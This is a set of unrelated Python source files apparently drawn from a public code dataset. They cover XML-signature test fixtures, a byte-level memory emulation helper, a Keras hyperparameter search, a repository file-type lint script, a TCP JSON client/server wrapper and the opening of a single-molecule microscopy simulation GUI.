backend = default_backend()
key = rsa.generate_private_key(
public_exponent=65537, key_size=2048, backend=backend
)
cert = (
x509.CertificateBuilder()
.subject_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "test")]))
.issuer_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "test")]))
.public_key(key.public_key())
.serial_number(x509.random_serial_number())
.not_valid_before(datetime.datetime.utcnow())
.not_valid_after(datetime.datetime.utcnow() + datetime.timedelta(days=1))
.sign(key, hashes.SHA256(), backend)
)
return key, cert
return factory
@pytest.fixture
def key_and_cert(tmp_path, key_factory) -> KeyAndCert:
key, cert = key_factory()
return KeyAndCert(tmp_path, key, cert)
@pytest.fixture
def signature_template() -> Callable[[SigningConfig], Element]:
def builder(
*, config: SigningConfig, certificate: Certificate, element_id: str
) -> Element:
return ds.Signature(
ds.SignedInfo(
ds.CanonicalizationMethod(Algorithm=XML_EXC_C14N),
ds.SignatureMethod(
Algorithm=utils.signature_method_algorithm(config.signature_method)
),
ds.Reference(
ds.Transforms(
ds.Transform(Algorithm=XMLDSIG_ENVELOPED_SIGNATURE),
ds.Transform(Algorithm=XML_EXC_C14N),
),
ds.DigestMethod(
Algorithm=utils.digest_method_algorithm(config.digest_method)
),
ds.DigestValue(),
URI="#" + element_id,
),
),
ds.SignatureValue(),
ds.KeyInfo(
ds.X509Data(utils.ascii_b64(certificate.public_bytes(Encoding.DER)))
),
)
return builder
|
the-stack_106_23257 | import re, math
class Int(int):
# def __repr__(self):
# return hex(self)
def __str__(self):
return hex(self)
def __add__(self, other):
return Int(super().__add__(other))
def __sub__(self, other):
return Int(super().__sub__(other))
def __lshift__(self, other):
return Int(super().__lshift__(other))
def __rshift__(self, other):
return Int(super().__rshift__(other))
def __xor__(self, other):
return Int(super().__xor__(other))
def __or__(self, other):
return Int(super().__or__(other))
def __and__(self, other):
return Int(super().__and__(other))
class Mem(object):
MEM_Q_MODE = "x"
MEM_X_MODE = "x"
MEM_W_MODE = "w"
MEM_B_MODE = "b"
MEM_DEFAULT_MODE = MEM_X_MODE
MEM_BIG_LATIN = 0
MEM_LITTLE_LATIN = 1
MEM_DEFAULT_LATIN = MEM_LITTLE_LATIN
MEM_MODE_MAPPING = {
MEM_Q_MODE: 16,
MEM_X_MODE: 8,
MEM_W_MODE: 4,
MEM_B_MODE: 1
}
MEM_MODE_MASK_MAPPING = {
MEM_Q_MODE: 0xFFFFFFFF_FFFFFFFF_FFFFFFFF_FFFFFFFF,
MEM_X_MODE: 0xFFFFFFFF_FFFFFFFF,
MEM_W_MODE: 0xFFFFFFFF,
MEM_B_MODE: 0xFF
}
def __init__(self, index:int, stack:list, mode=None, latin=None):
self.index = index
self.stack = stack
self.latin = latin
if self.latin is None:
self.latin = self.MEM_DEFAULT_LATIN
def read(self, item, mode=None):
if mode is None:
mode = Mem.MEM_DEFAULT_MODE
byte_size = Mem.MEM_MODE_MAPPING[mode]
return Mem.mem_read(self.stack[self.index + item:], 1, byte_size, self.latin)
def write(self, value, mode, latin):
if isinstance(value, Stack):
value = value.to_value()
assert isinstance(value, int), "required int value"
value = value & self.MEM_MODE_MASK_MAPPING[mode]
int_values = Mem.int_to_arr(value, mode)
if latin == 1:
int_values.reverse()
self[0] = Stack(0, int_values, mode, latin)
return self
@property
def x(self):
return Stack(self.index, self.stack, self.MEM_X_MODE, self.latin)
@x.setter
def x(self, value):
self.write(value, self.MEM_X_MODE, self.latin)
@property
def w(self):
return Stack(self.index, self.stack, self.MEM_W_MODE, self.latin)
@w.setter
def w(self, value):
self.write(value, self.MEM_W_MODE, self.latin)
@property
def b(self):
return Stack(self.index, self.stack, self.MEM_B_MODE, self.latin)
@b.setter
def b(self, value):
self.write(value, self.MEM_B_MODE, self.latin)
@property
def ldp(self):
# 只支持x,如果w和其他模式,需人工换方法
return Mem.mem_read(self, 2, byte_size=8, mode=1)
@ldp.setter
def stp(self, value):
# 只支持x
self.x = value[0]
(self + 0x8).x = value[1]
def __getitem__(self, item):
if isinstance(item, slice):
s, e = item.start, item.stop
s = s + self.index if s else self.index
e = e + self.index if e else None
assert not e or len(self.stack) > e - s
return self.stack[slice(s, e, item.step)]
return self.stack[self.index + item]
def __setitem__(self, key, value):
# 功能:1:可以超长赋值. 2:自动根据value修正覆盖范围
if isinstance(value, int):
self.stack[self.index + key:self.index + key + 1] = [value & 0xFF]
return
elif isinstance(value, Mem):
value = value.to_list()
assert isinstance(value, list)
if isinstance(key, slice):
s, e = key.start, key.stop
s = s + self.index if s else self.index
e = e + self.index if e else None
self.stack[slice(s, e, key.step)] = value
else:
self.stack[self.index + key:self.index + key + len(value)] = value
def __add__(self, other):
assert isinstance(other, int) and other < len(self)
return Mem(self.index + other, self.stack)
def __sub__(self, other):
assert isinstance(other, int) and self.index >= other
return Mem(self.index - other, self.stack)
def __xor__(self, other):
_a = self.to_list()
if isinstance(other, int):
return Mem(0, [_ ^ other for _ in _a])
if isinstance(other, Mem):
other = other.to_list()
assert isinstance(other, list)
_len = min(len(self), len(other))
return Mem(0, [_a[_] ^ other[_] for _ in range(_len)])
def __and__(self, other):
_a = self.to_list()
if isinstance(other, int):
return Mem(0, [_ & other for _ in _a])
if isinstance(other, Mem):
other = other.to_list()
assert isinstance(other, list)
_len = min(len(self), len(other))
return Mem(0, [_a[_] & other[_] for _ in range(_len)])
def __or__(self, other):
_a = self.to_list()
if isinstance(other, int):
return Mem(0, [_ | other for _ in _a])
if isinstance(other, Mem):
other = other.to_list()
assert isinstance(other, list)
_len = min(len(self), len(other))
return Mem(0, [_a[_] | other[_] for _ in range(_len)])
def __repr__(self):
if self.stack:
return Mem.hex(self.stack[self.index:self.index+32]) + "..."
return "Mem is None..."
def __len__(self):
return len(self.stack) - self.index
@staticmethod
def create(size, mode="b"):
assert isinstance(size, int)
return Mem(0, [0 for i in range(size)], mode)
def to_list(self):
return self.stack[self.index:]
def to_hex_list(self):
return [hex(_) for _ in self.stack[self.index:]]
@staticmethod
def mem_read(x0, return_size=1, byte_size=4, mode=1):
# mode = 1 小头, mode = 0 大头
return_list = []
for i in range(return_size):
a = x0[i*byte_size:i*byte_size+byte_size]
if mode == 1:
a.reverse()
return_list.append(Mem.merge_arr_to_int(a))
if return_size == 1:
return return_list[0]
return return_list
@staticmethod
def merge_arr_to_int(arr):
# 如有字节序,则数组必须是处理好的
int_value = 0
arr.reverse()
for i, a in enumerate(arr):
int_value += a << i * 8
return Int(int_value)
@staticmethod
def int_to_arr(int_value, mode=None):
if mode is None:
mode = Mem.MEM_DEFAULT_MODE
byte_size = Mem.MEM_MODE_MAPPING[mode]
bstr = bin(int_value).replace("0b", "")
while len(bstr) % 8 != 0:
bstr = "0" + bstr
assert len(bstr) // 8 <= byte_size
barr = re.findall("[01]{8}", bstr)
barr = [Int("0b" + i, 2) for i in barr]
tmp_arr = [0 for _ in range(byte_size - len(barr))]
return tmp_arr + barr
@staticmethod
def read_file(file_path):
with open(file_path) as f:
text = f.read()
return Mem.read_text(text)
@staticmethod
def read_text(text):
results = re.findall("(0x[a-zA-Z0-9]+): (.+?)\\s\\s", text + " ")
stack = []
for result in results:
addr, value = result
values = [Int("0x" + v, 16) for v in value.split(" ")]
stack += values
return Mem(0, stack)
@staticmethod
def hex(value):
if isinstance(value, Mem):
mem_size = 16
int_list = value.to_list()
loop_time = math.ceil(len(int_list) / mem_size)
text = ""
for i in range(loop_time):
text += Mem.hex(int_list[i*mem_size:(i+1) * mem_size]) + "\n"
return text
elif isinstance(value, list):
int_value = []
for v in value:
if v <= 0xF:
v = "0" + hex(v).replace("0x", "")
else:
v = hex(v)
int_value.append(v.replace("0x", ""))
return " ".join(int_value)
else:
return hex(value)
class Stack(Mem):
def __init__(self, index, stack:list, mode=None, latin=None):
self.mode = mode or Mem.MEM_DEFAULT_MODE
super().__init__(index, stack, latin)
def __getitem__(self, item):
result = super().__getitem__(slice(item, item + self.MEM_MODE_MAPPING[self.mode], None))
if self.latin:
result.reverse()
return Mem.merge_arr_to_int(result)
def to_value(self):
result = super().__getitem__(slice(0, 0 + self.MEM_MODE_MAPPING[self.mode], None))
if self.latin:
result.reverse()
return Mem.merge_arr_to_int(result)
def __setitem__(self, key, value):
# 例子:x0[:]=value;x0[0]=value
# x0可以是Mem或Stack. value是Int, int, Stack
assert isinstance(value, int)
if isinstance(value, int):
arr = Mem.int_to_arr(value, self.mode)
if self.latin == 1:
arr.reverse()
super().__setitem__(key, value)
|
the-stack_106_23259 | from hyperopt import Trials, STATUS_OK, tpe
from hyperas import optim
from hyperas.distributions import choice, uniform
import os, sys
import numpy as np
from sklearn.utils import class_weight
import tensorflow as tf
from keras.backend.tensorflow_backend import set_session
from keras.utils import to_categorical
from keras import Input, models, layers, regularizers, callbacks, optimizers
from keras.utils import to_categorical
def data():
random_seed = 10
# data = np.load('/public/home/sry/mCNN/dataset/S2648/feature/mCNN/wild/npz/center_CA_PCA_False_neighbor_30.npz')
data = np.load('/dl/sry/mCNN/dataset/S2648/feature/mCNN/mutant/npz/center_CA_PCA_False_neighbor_100.npz')
# data = np.load('E:/projects/mCNN/yanglab/mCNN-master/dataset/S2648/mCNN/wild/center_CA_PCA_False_neighbor_30.npz')
x = data['x']
y = data['y']
ddg = data['ddg'].reshape(-1)
train_num = x.shape[0]
indices = [i for i in range(train_num)]
np.random.seed(random_seed)
np.random.shuffle(indices)
x = x[indices]
y = y[indices]
positive_indices, negative_indices = ddg >= 0, ddg < 0
x_positive, x_negative = x[positive_indices], x[negative_indices]
y_positive, y_negative = y[positive_indices], y[negative_indices]
left_positive, left_negative = round(0.8 * x_positive.shape[0]), round(0.8 * x_negative.shape[0])
x_train, x_test = np.vstack((x_positive[:left_positive], x_negative[:left_negative])), np.vstack(
(x_positive[left_positive:], x_negative[left_negative:]))
y_train, y_test = np.vstack((y_positive[:left_positive], y_negative[:left_negative])), np.vstack(
(y_positive[left_positive:], y_negative[left_negative:]))
# sort row default is chain
# reshape and one-hot
y_train = to_categorical(y_train)
y_test = to_categorical(y_test)
# normalization
train_shape = x_train.shape
test_shape = x_test.shape
col_train = train_shape[-1]
col_test = test_shape[-1]
x_train = x_train.reshape((-1, col_train))
x_test = x_test.reshape((-1, col_test))
mean = x_train.mean(axis=0)
std = x_train.std(axis=0)
std[np.argwhere(std == 0)] = 0.01
x_train -= mean
x_train /= std
x_test -= mean
x_test /= std
x_train = x_train.reshape(train_shape)
x_test = x_test.reshape(test_shape)
# reshape
x_train = x_train.reshape(x_train.shape + (1,))
x_test = x_test.reshape(x_test.shape + (1,))
return x_train, y_train, x_test, y_test
def Conv2DClassifierIn1(x_train,y_train,x_test,y_test):
summary = True
verbose = 1
# setHyperParams------------------------------------------------------------------------------------------------
batch_size = {{choice([32,64,128,256,512])}}
epoch = {{choice([25,50,75,100,125,150,175,200])}}
conv_block={{choice(['two', 'three', 'four'])}}
conv1_num={{choice([8, 16, 32, 64])}}
conv2_num={{choice([16,32,64,128])}}
conv3_num={{choice([32,64,128])}}
conv4_num={{choice([32, 64, 128, 256])}}
dense1_num={{choice([128, 256, 512])}}
dense2_num={{choice([64, 128, 256])}}
l1_regular_rate = {{uniform(0.00001, 1)}}
l2_regular_rate = {{uniform(0.000001, 1)}}
drop1_num={{uniform(0.1, 1)}}
drop2_num={{uniform(0.0001, 1)}}
activator={{choice(['elu','relu','tanh'])}}
optimizer={{choice(['adam','rmsprop','SGD'])}}
#---------------------------------------------------------------------------------------------------------------
kernel_size = (3, 3)
pool_size = (2, 2)
initializer = 'random_uniform'
padding_style = 'same'
loss_type='binary_crossentropy'
metrics=['accuracy']
my_callback = None
# early_stopping = EarlyStopping(monitor='val_loss', patience=4)
# checkpointer = ModelCheckpoint(filepath='keras_weights.hdf5',
# verbose=1,
# save_best_only=True)
# my_callback = callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.2,
# patience=5, min_lr=0.0001)
# build --------------------------------------------------------------------------------------------------------
input_layer = Input(shape=x_train.shape[1:])
conv = layers.Conv2D(conv1_num,kernel_size,padding=padding_style,kernel_initializer=initializer,activation=activator)(input_layer)
conv = layers.Conv2D(conv1_num,kernel_size,padding=padding_style,kernel_initializer=initializer,activation=activator)(conv)
pool = layers.MaxPooling2D(pool_size,padding=padding_style)(conv)
if conv_block == 'two':
conv = layers.Conv2D(conv2_num,kernel_size,padding=padding_style,kernel_initializer=initializer,activation=activator)(pool)
conv = layers.Conv2D(conv2_num,kernel_size,padding=padding_style,kernel_initializer=initializer,activation=activator)(conv)
BatchNorm = layers.BatchNormalization(axis=-1)(conv)
pool = layers.MaxPooling2D(pool_size,padding=padding_style)(BatchNorm)
elif conv_block == 'three':
conv = layers.Conv2D(conv2_num,kernel_size,padding=padding_style,kernel_initializer=initializer,activation=activator)(pool)
conv = layers.Conv2D(conv2_num,kernel_size,padding=padding_style,kernel_initializer=initializer,activation=activator)(conv)
BatchNorm = layers.BatchNormalization(axis=-1)(conv)
pool = layers.MaxPooling2D(pool_size,padding=padding_style)(BatchNorm)
conv = layers.Conv2D(conv3_num,kernel_size,padding=padding_style,kernel_initializer=initializer,activation=activator)(pool)
conv = layers.Conv2D(conv3_num,kernel_size,padding=padding_style,kernel_initializer=initializer,activation=activator)(conv)
BatchNorm = layers.BatchNormalization(axis=-1)(conv)
pool = layers.MaxPooling2D(pool_size,padding=padding_style)(BatchNorm)
elif conv_block == 'four':
conv = layers.Conv2D(conv2_num,kernel_size,padding=padding_style,kernel_initializer=initializer,activation=activator)(pool)
conv = layers.Conv2D(conv2_num,kernel_size,padding=padding_style,kernel_initializer=initializer,activation=activator)(conv)
BatchNorm = layers.BatchNormalization(axis=-1)(conv)
pool = layers.MaxPooling2D(pool_size,padding=padding_style)(BatchNorm)
conv = layers.Conv2D(conv3_num,kernel_size,padding=padding_style,kernel_initializer=initializer,activation=activator)(pool)
conv = layers.Conv2D(conv3_num,kernel_size,padding=padding_style,kernel_initializer=initializer,activation=activator)(conv)
BatchNorm = layers.BatchNormalization(axis=-1)(conv)
pool = layers.MaxPooling2D(pool_size,padding=padding_style)(BatchNorm)
conv = layers.Conv2D(conv4_num,kernel_size,padding=padding_style,kernel_initializer=initializer,activation=activator)(pool)
conv = layers.Conv2D(conv4_num,kernel_size,padding=padding_style,kernel_initializer=initializer,activation=activator)(conv)
BatchNorm = layers.BatchNormalization(axis=-1)(conv)
pool = layers.MaxPooling2D(pool_size,padding=padding_style)(BatchNorm)
flat = layers.Flatten()(pool)
drop = layers.Dropout(drop1_num)(flat)
dense = layers.Dense(dense1_num, activation=activator, kernel_regularizer=regularizers.l1_l2(l1=l1_regular_rate,l2=l2_regular_rate))(drop)
BatchNorm = layers.BatchNormalization(axis=-1)(dense)
drop = layers.Dropout(drop2_num)(BatchNorm)
dense = layers.Dense(dense2_num, activation=activator, kernel_regularizer=regularizers.l1_l2(l1=l1_regular_rate,l2=l2_regular_rate))(drop)
output_layer = layers.Dense(len(np.unique(y_train)),activation='softmax')(dense)
model = models.Model(inputs=input_layer, outputs=output_layer)
if summary:
model.summary()
# train(self):
class_weights = class_weight.compute_class_weight('balanced', np.unique(y_train), y_train.reshape(-1))
class_weights_dict = dict(enumerate(class_weights))
model.compile(optimizer=optimizer,
loss=loss_type,
metrics=metrics # accuracy
)
result = model.fit(x=x_train,
y=y_train,
batch_size=batch_size,
epochs=epoch,
verbose=verbose,
callbacks=my_callback,
validation_data=(x_test, y_test),
shuffle=True,
class_weight=class_weights_dict
)
validation_acc = np.amax(result.history['val_acc'])
print('Best validation acc of epoch:', validation_acc)
return {'loss': -validation_acc, 'status': STATUS_OK, 'model': model}
if __name__ == '__main__':
# config TF-----------------------------------------------------------------------------------------------------
CUDA, max_eval = sys.argv[1:]
os.environ['CUDA_VISIBLE_DEVICES'] = CUDA
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
set_session(tf.Session(config=config))
# x_train, y_train, x_test, y_test = data()
# Conv2DClassifierIn1(x_train, y_train, x_test, y_test)
best_run, best_model = optim.minimize(model=Conv2DClassifierIn1,
data=data,
algo=tpe.suggest,
max_evals=int(max_eval),
keep_temp=False,
trials=Trials())
for trial in Trials():
print(trial)
X_train, Y_train, X_test, Y_test = data()
print("Evalutation of best performing model:")
print(best_model.evaluate(X_test, Y_test))
print("Best performing model chosen hyper-parameters:")
print(best_run)
|
the-stack_106_23261 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Helper tool to check file types that are allowed to checkin."""
import os
import sys
import subprocess
# List of file types we allow
ALLOW_EXTENSION = {
# source code
"cc",
"c",
"h",
"s",
"rs",
"m",
"mm",
"g4",
"gradle",
"js",
"tcl",
"scala",
"java",
"go",
"sh",
"py",
"pyi",
"pxi",
"pyd",
"pyx",
"cu",
# relay text format
"rly",
# configurations
"mk",
"in",
"cmake",
"xml",
"toml",
"yml",
"yaml",
"json",
# docs
"txt",
"md",
"rst",
# sgx
"edl",
"lds",
# ios
"pbxproj",
"plist",
"xcworkspacedata",
"storyboard",
# hw/chisel
"sbt",
"properties",
"v",
"sdc",
# generated parser
"interp",
"tokens",
# interface definition
"idl",
}
# List of file names allowed
ALLOW_FILE_NAME = {
".gitignore",
".gitattributes",
"README",
"Makefile",
"Doxyfile",
"pylintrc",
"rat-excludes",
"log4j.properties",
".clang-format",
".gitmodules",
"CODEOWNERS",
".scalafmt.conf",
"Cargo.lock",
"with_the_same_user",
}
# List of specific files allowed in relpath to <proj_root>
ALLOW_SPECIFIC_FILE = {
"LICENSE",
"NOTICE",
"KEYS",
"DISCLAIMER",
"Jenkinsfile",
# cargo config
"rust/runtime/tests/test_wasm32/.cargo/config",
"apps/sgx/.cargo/config",
# html for demo purposes
"tests/webgl/test_static_webgl_library.html",
"web/example_rpc.html",
# images are normally not allowed
# discuss with committers before add more images
"apps/android_rpc/app/src/main/res/mipmap-hdpi/ic_launcher.png",
"apps/android_rpc/app/src/main/res/mipmap-mdpi/ic_launcher.png",
# documentation related files
"docs/_static/css/tvm_theme.css",
"docs/_static/img/tvm-logo-small.png",
"docs/_static/img/tvm-logo-square.png",
}
def filename_allowed(name):
"""Check if name is allowed by the current policy.
Paramaters
----------
name : str
Input name
Returns
-------
allowed : bool
Whether the filename is allowed.
"""
arr = name.rsplit(".", 1)
if arr[-1] in ALLOW_EXTENSION:
return True
if os.path.basename(name) in ALLOW_FILE_NAME:
return True
if os.path.basename(name).startswith("Dockerfile"):
return True
if name.startswith("3rdparty"):
return True
if name in ALLOW_SPECIFIC_FILE:
return True
return False
def copyright_line(line):
# Following two items are intentionally break apart
# so that the copyright detector won't detect the file itself.
if line.find("Copyright " + "(c)") != -1:
return True
if (line.find("Copyright") != -1 and
line.find(" by") != -1):
return True
return False
def check_asf_copyright(fname):
if fname.endswith(".png"):
return True
if not os.path.isfile(fname):
return True
has_asf_header = False
has_copyright = False
try:
for line in open(fname):
if line.find("Licensed to the Apache Software Foundation") != -1:
has_asf_header = True
if copyright_line(line):
has_copyright = True
if has_asf_header and has_copyright:
return False
except UnicodeDecodeError:
pass
return True
def main():
cmd = ["git", "ls-files"]
proc = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
(out, _) = proc.communicate()
assert proc.returncode == 0
res = out.decode("utf-8")
flist = res.split()
error_list = []
for fname in flist:
if not filename_allowed(fname):
error_list.append(fname)
if error_list:
report = "------File type check report----\n"
report += "\n".join(error_list)
report += "\nFound %d files that are now allowed\n" % len(error_list)
report += ("We do not check in binary files into the repo.\n"
"If necessary, please discuss with committers and"
"modify tests/lint/check_file_type.py to enable the file you need.\n")
sys.stderr.write(report)
sys.stderr.flush()
sys.exit(-1)
asf_copyright_list = []
for fname in res.split():
if not check_asf_copyright(fname):
asf_copyright_list.append(fname)
if asf_copyright_list:
report = "------File type check report----\n"
report += "\n".join(asf_copyright_list) + "\n"
report += "------Found %d files that has ASF header with copyright message----\n" % len(asf_copyright_list)
report += "--- Files with ASF header do not need Copyright lines.\n"
report += "--- Contributors retain copyright to their contribution by default.\n"
report += "--- If a file comes with a different license, consider put it under the 3rdparty folder instead.\n"
report += "---\n"
report += "--- You can use the following steps to remove the copyright lines\n"
report += "--- Create file_list.txt in your text editor\n"
report += "--- Copy paste the above content in file-list into file_list.txt\n"
report += "--- python3 tests/lint/add_asf_header.py file_list.txt\n"
sys.stderr.write(report)
sys.stderr.flush()
sys.exit(-1)
print("check_file_type.py: all checks passed..")
if __name__ == "__main__":
main()
|
the-stack_106_23266 | from point import Point
import socket
import json
class Connection:
"""A simple TCP wrapper class that acts a client OR server with similar
methods regardless of which it is connected as
"""
def __init__(self, port, host=None):
"""Creates a connection, basically a simple TCP client/server wrapper
Args:
port: the port to connect through
host: if set then will connect to that host as a client,
otherwise acts a server on host "0.0.0.0"
"""
self._tcp_socket = socket.socket()
self.curve = None
if not host:
# then we are the server that connects to client(s)
host = "0.0.0.0"
# before connecting, reuse the port if needed
self._tcp_socket.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1
)
# and connect to the port as a server listening for clients
self._tcp_socket.bind((host, port))
self._tcp_socket.listen(1)
print("Connection listing on {}:{}\n".format(host, port))
self.connection, address = self._tcp_socket.accept()
else:
# we are a client connecting to a server
self._tcp_socket.connect((host, port))
self.connection = self._tcp_socket
print("Connection attempting to connect to {}:{}\n".format(
host, port
))
def send(self, obj):
"""Sends some object as json over the connection
Args:
obj: an object safe for json serialization
Note: Points can be serialized
"""
# ensure points safe for serialization
if isinstance(obj, Point):
obj = {'x': obj.x, 'y': obj.y}
string = json.dumps(obj)
self.connection.send(string.encode())
def read(self):
"""Read (blocking) from the connection until something is sent and parsed
Returns:
parsed json output from the connection
"""
buffer = ""
while True:
data = self.connection.recv(1024).decode()
if not data:
continue
data = str(data)
if data:
buffer += data
if len(data) == 1024:
continue # we need to read more data
else:
break
parsed = self._clean(json.loads(buffer))
return parsed
def close(self):
"""Closes this network connection(s)
"""
self.connection.close()
if self.connection != self._tcp_socket:
self._tcp_socket.close()
def _clean(self, parsed):
"""Cleans a parsed json object to Points if need be
Args:
parsed: valid json object already parsed such as a dict or string
Returns:
if parsed looks like a Point but is a dict, it will become a Point
"""
if (self.curve and isinstance(parsed, dict) and
'x' in parsed and 'y' in parsed):
parsed = Point(parsed['x'], parsed['y'], self.curve)
return parsed
|
the-stack_106_23268 | """
picasso.simulate-gui
~~~~~~~~~~~~~~~~
GUI for Simulate :
Simulate single molcule fluorescence data
:author: Maximilian Thomas Strauss, 2016
:copyright: Copyright (c) 2016 Jungmann Lab, MPI of Biochemistry
"""
import csv
import glob as _glob
import os
import sys
import time
import yaml
import matplotlib.patches as patches
import matplotlib.pyplot as plt
import numpy as _np
from matplotlib.backends.backend_qt4agg import (
FigureCanvasQTAgg as FigureCanvas,
)
from matplotlib.backends.backend_qt4agg import (
NavigationToolbar2QT as NavigationToolbar,
)
from PyQt5 import QtCore, QtGui, QtWidgets
from scipy.optimize import curve_fit
from scipy.stats import norm
import os.path as _ospath
from .. import io as _io
from .. import lib, simulate
def fitFuncBg(x, a, b):
return (a + b * x[0]) * x[1] * x[2]
def fitFuncStd(x, a, b, c):
return a * x[0] * x[1] + b * x[2] + c
plt.style.use("ggplot")
"DEFAULT PARAMETERS"
CURRENTROUND = 0
ADVANCEDMODE = 0 # 1 is with calibration of noise model
# CAMERA
IMAGESIZE_DEFAULT = 32
ITIME_DEFAULT = 300
FRAMES_DEFAULT = 7500
PIXELSIZE_DEFAULT = 160
# PAINT
KON_DEFAULT = 1600000
IMAGERCONCENTRATION_DEFAULT = 5
MEANBRIGHT_DEFAULT = 500
# IMAGER
LASERPOWER_DEFAULT = 1.5 # POWER DENSITY
POWERDENSITY_CONVERSION = 20
STDFACTOR = 1.82
if ADVANCEDMODE:
LASERPOWER_DEFAULT = 30
PSF_DEFAULT = 0.82
PHOTONRATE_DEFAULT = 53
PHOTONRATESTD_DEFAULT = 29
PHOTONBUDGET_DEFAULT = 1500000
PHOTONSLOPE_DEFAULT = 35
PHOTONSLOPESTD_DEFAULT = 19
if ADVANCEDMODE:
PHOTONSLOPE_DEFAULT = 1.77
PHOTONSLOPESTD_DEFAULT = 0.97
# NOISE MODEL
LASERC_DEFAULT = 0.012063
IMAGERC_DEFAULT = 0.003195
EQA_DEFAULT = -0.002866
EQB_DEFAULT = 0.259038
EQC_DEFAULT = 13.085473
BGOFFSET_DEFAULT = 0
BGSTDOFFSET_DEFAULT = 0
# STRUCTURE
STRUCTURE1_DEFAULT = 3
STRUCTURE2_DEFAULT = 4
STRUCTURE3_DEFAULT = "20,20"
STRUCTUREYY_DEFAULT = "0,20,40,60,0,20,40,60,0,20,40,60"
STRUCTUREXX_DEFAULT = "0,20,40,0,20,40,0,20,40,0,20,40"
STRUCTUREEX_DEFAULT = "1,1,1,1,1,1,1,1,1,1,1,1"
STRUCTURE3D_DEFAULT = "0,0,0,0,0,0,0,0,0,0,0,0"
STRUCTURENO_DEFAULT = 9
STRUCTUREFRAME_DEFAULT = 6
INCORPORATION_DEFAULT = 85
# Default 3D calibration
CX_DEFAULT = [
3.1638306844743706e-17,
-2.2103661248660896e-14,
-9.775815406044296e-12,
8.2178622893072e-09,
4.91181990105529e-06,
-0.0028759382006135654,
1.1756537760039398,
]
CY_DEFAULT = [
1.710907877866197e-17,
-2.4986657766862576e-15,
-8.405284979510355e-12,
1.1548322314075128e-11,
5.4270591055277476e-06,
0.0018155881468011011,
1.011468185618154,
]
class Window(QtWidgets.QMainWindow):
def __init__(self):
super().__init__()
self.setWindowTitle("Picasso: Simulate")
self.setSizePolicy(
QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding
)
this_directory = os.path.dirname(os.path.realpath(__file__))
icon_path = os.path.join(this_directory, "icons", "simulate.ico")
icon = QtGui.QIcon(icon_path)
self.setWindowIcon(icon)
self.initUI()
def initUI(self):
self.currentround = CURRENTROUND
self.structureMode = True
self.grid = QtWidgets.QGridLayout()
self.grid.setSpacing(5)
# CAMERA PARAMETERS
camera_groupbox = QtWidgets.QGroupBox("Camera parameters")
cgrid = QtWidgets.QGridLayout(camera_groupbox)
camerasize = QtWidgets.QLabel("Image size")
integrationtime = QtWidgets.QLabel("Integration time")
totaltime = QtWidgets.QLabel("Total acquisition time")
frames = QtWidgets.QLabel("Frames")
pixelsize = QtWidgets.QLabel("Pixelsize")
self.camerasizeEdit = QtWidgets.QSpinBox()
self.camerasizeEdit.setRange(1, 512)
self.integrationtimeEdit = QtWidgets.QSpinBox()
self.integrationtimeEdit.setRange(1, 10000) # 1-10.000ms
self.framesEdit = QtWidgets.QSpinBox()
self.framesEdit.setRange(10, 100000000) # 10-100.000.000 frames
self.framesEdit.setSingleStep(1000)
self.pixelsizeEdit = QtWidgets.QSpinBox()
self.pixelsizeEdit.setRange(1, 1000) # 1 to 1000 nm frame size
self.totaltimeEdit = QtWidgets.QLabel()
# Deactivate keyboard tracking
self.camerasizeEdit.setKeyboardTracking(False)
self.pixelsizeEdit.setKeyboardTracking(False)
self.camerasizeEdit.setValue(IMAGESIZE_DEFAULT)
self.integrationtimeEdit.setValue(ITIME_DEFAULT)
self.framesEdit.setValue(FRAMES_DEFAULT)
self.pixelsizeEdit.setValue(PIXELSIZE_DEFAULT)
self.integrationtimeEdit.valueChanged.connect(self.changeTime)
self.framesEdit.valueChanged.connect(self.changeTime)
self.camerasizeEdit.valueChanged.connect(self.generatePositions)
self.pixelsizeEdit.valueChanged.connect(self.changeStructDefinition)
cgrid.addWidget(camerasize, 1, 0)
cgrid.addWidget(self.camerasizeEdit, 1, 1)
cgrid.addWidget(QtWidgets.QLabel("Px"), 1, 2)
cgrid.addWidget(integrationtime, 2, 0)
cgrid.addWidget(self.integrationtimeEdit, 2, 1)
cgrid.addWidget(QtWidgets.QLabel("ms"), 2, 2)
cgrid.addWidget(frames, 3, 0)
cgrid.addWidget(self.framesEdit, 3, 1)
cgrid.addWidget(totaltime, 4, 0)
cgrid.addWidget(self.totaltimeEdit, 4, 1)
cgrid.addWidget(QtWidgets.QLabel("min"), 4, 2)
cgrid.addWidget(pixelsize, 5, 0)
cgrid.addWidget(self.pixelsizeEdit, 5, 1)
cgrid.addWidget(QtWidgets.QLabel("nm"), 5, 2)
cgrid.addItem(
QtWidgets.QSpacerItem(
1, 1, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding
)
)
# PAINT PARAMETERS
paint_groupbox = QtWidgets.QGroupBox("PAINT parameters")
pgrid = QtWidgets.QGridLayout(paint_groupbox)
kon = QtWidgets.QLabel("k<sub>On</sub>")
imagerconcentration = QtWidgets.QLabel("Imager concentration")
taud = QtWidgets.QLabel("Dark time")
taub = QtWidgets.QLabel("Bright time")
self.konEdit = QtWidgets.QDoubleSpinBox()
self.konEdit.setRange(1, 10000000000)
self.konEdit.setDecimals(0)
self.konEdit.setSingleStep(100000)
self.imagerconcentrationEdit = QtWidgets.QDoubleSpinBox()
self.imagerconcentrationEdit.setRange(0.01, 1000)
self.taudEdit = QtWidgets.QLabel()
self.taubEdit = QtWidgets.QDoubleSpinBox()
self.taubEdit.setRange(1, 10000)
self.taubEdit.setDecimals(0)
self.taubEdit.setSingleStep(10)
